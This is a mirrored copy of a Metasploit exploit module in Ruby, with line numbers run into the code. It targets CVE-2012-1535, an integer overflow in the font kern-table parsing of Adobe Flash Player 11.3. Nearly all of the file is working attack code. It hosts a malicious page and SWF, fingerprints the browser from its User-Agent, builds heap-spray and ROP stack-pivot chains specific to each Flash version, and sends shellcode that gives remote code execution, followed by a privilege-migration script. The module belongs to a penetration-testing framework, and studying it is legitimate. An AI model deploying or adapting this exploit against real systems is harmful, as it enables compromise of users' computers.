CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/browser/adobe_flash_otf_font.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::RopDb1011def initialize(info={})12super(update_info(info,13'Name' => "Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow",14'Description' => %q{15This module exploits a vulnerability found in the ActiveX component of Adobe16Flash Player before 11.3.300.271. By supplying a specially crafted .otf font file17with a large nTables value in the 'kern' header, it is possible to trigger an18integer overflow, which results in remote code execution under the context of the19user. This vulnerability has also been exploited in the wild in limited targeted20attacks. Please note in order to ensure reliability, the exploit is forced to21modify your URIPATH parameter to less than 3 characters, which may cause possible22URIPATH collisions.23},24'License' => MSF_LICENSE,25'Author' =>26[27'Alexander Gavrun', #Through iDefense28'sinn3r',29'juan vazquez'30],31'References' =>32[33[ 'CVE', '2012-1535' ],34[ 'OSVDB', '84607'],35[ 'BID', '55009'],36[ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/' ],37[ 'URL', 'https://developer.apple.com/fonts/TTRefMan/RM06/Chap6.html' ],38[ 'URL', 'http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html' ],39[ 'URL', 'https://www.rapid7.com/blog/post/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit' ],40[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-18.html']41],42'Payload' =>43{44'Space' => 102445},46'DefaultOptions' =>47{48'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'49},50'Platform' => 'win',51'Targets' =>52[53# Tested successfully on:54# Flash 11.2.202.23355# Flash 11.3.300.26856# Flash 11.3.300.26557# Flash 11.3.300.25758[ 'Automatic', {} ],59[ 'IE 6 on Windows XP SP3', {'Rop' => nil } ],60[ 'IE 7 on Windows XP SP3', {'Rop' => nil } ],61[ 'IE 8 on Windows XP SP3', {'Rop' => true, 'ASLR' => false } ],62[ 'IE 7 on Windows Vista SP2', {'Rop' => nil }],63[ 'IE 8 on Windows 7 SP1', {'Rop' => true, 'ASLR' => true } ],64[ 'IE 9 on Windows 7 SP1', {'Rop' => true, 'ASLR' => true } ]65],66'Privileged' => false,67'DisclosureDate' => '2012-08-09',68'DefaultTarget' => 0))6970register_options(71[72OptEnum.new('ROP', [true, "The ROP chain to use", 'SWF', %w(SWF JRE)]),73])74end7576def get_payload(t, flash_version=nil)77if t['Rop'].nil?78p = [790x0c0c0c0c, # mapped at 1e0d0000800x0c0c0c0c,810x0c0c0c0c, # mapped at 1e0d000882].pack("V*")8384p << payload.encoded85return p86end8788if t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/89print_status("Using Rop Chain For Flash: #{flash_version}")90pivot = [910x10004171, # POP EDI # POP ESI # RETN (1e0d0000)920x0c0c0c0c,930x1001d891, # xchg eax, esp # ret (1e0d0008)94].pack("V*")9596p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot})9798elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/99print_status("Using Rop Chain For Flash: #{flash_version}")100pivot = [1010x10004171, # POP EDI # POP ESI # RETN (1e0d0000)1020x0c0c0c0c,1030x1001d6d3, # xchg eax, esp # ret (1e0d0008)104].pack("V*")105106p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot})107108elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/109print_status("Using Rop Chain For Flash: #{flash_version}")110pivot = [1110x10004171, # POP EDI # POP ESI # RETN (1e0d0000)1120x0c0c0c0c,1130x1001d755, # xchg eax, esp # ret (1e0d0008)114].pack("V*")115116p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.268', 'pivot'=>pivot})117118else119print_status("Default back to JRE ROP")120pivot = [1210x7c34a028, # POP EDI # POP ESI # RETN (1e0d0000)1220x0c0c0c0c,1230x7c348b05, # xchg eax, esp # ret (1e0d0008)124].pack("V*")125126p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})127end128129return p130end131132def get_target(agent)133#If the user is already specified by the user, we'll just use that134return target if target.name != 'Automatic'135136if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/137return targets[1] #IE 6 on Windows XP SP3138elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/139return targets[2] #IE 7 on Windows XP SP3140elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/141return targets[3] #IE 8 on Windows XP SP3142elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/143return targets[4] #IE 7 on Windows Vista SP2144elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/145return targets[5] #IE 8 on Windows 7 SP1146elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/147return targets[6] #IE 9 on Windows 7 SP1148else149return nil150end151end152153def on_request_uri(cli, request)154agent = request.headers['User-Agent']155my_target = get_target(agent)156157# Avoid the attack if the victim doesn't have the same setup we're targeting158if my_target.nil?159print_error("Browser not supported: #{agent}")160send_not_found(cli)161return162end163164print_status("Target selected: #{my_target.name}")165print_status("Client requesting: #{request.uri}")166167# The SWF request itself168if request.uri =~ /\.swf$/169print_status("Sending SWF")170send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})171return172end173174# The TXT payload request175if request.uri =~ /\.txt$/176flash_version = request.headers['x-flash-version']177shellcode = get_payload(my_target, flash_version).unpack('H*')[0]178print_status("Sending Payload")179send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })180return181end182183#swf_uri = get_resource() + Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"184swf_uri = "/#{@resource_name}.txt.swf"185186html = %Q|187<html>188<head>189</head>190<body>191<object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">192<param name="movie" value="#{swf_uri}">193<param name="FlashVars" value="s=#{@resource_name}">194</object>195</body>196</html>197|198199html = html.gsub(/^ {4}/, '')200201print_status("Sending HTML")202send_response(cli, html, {'Content-Type'=>'text/html'})203end204205def primer206# we need to handle direct /pay.txt requests207hardcoded_uripath("/#{@resource_name}.txt")208end209210def exploit211@swf = create_swf212@resource_name = Rex::Text.rand_text_alpha(5)213vprint_status("SWF Loaded: #{@swf.length.to_s} bytes")214215datastore['URIPATH'] = datastore['URIPATH'] || random_uri216datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//217datastore['URIPATH'] = datastore['URIPATH'][0,3] if datastore['URIPATH'].length > 3218print_warning("URIPATH set to #{datastore['URIPATH']}")219220super221end222223def create_swf224path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2012-1535", "Main.swf" )225fd = ::File.open( path, "rb" )226swf = fd.read(fd.stat.size)227fd.close228return swf229end230end231232233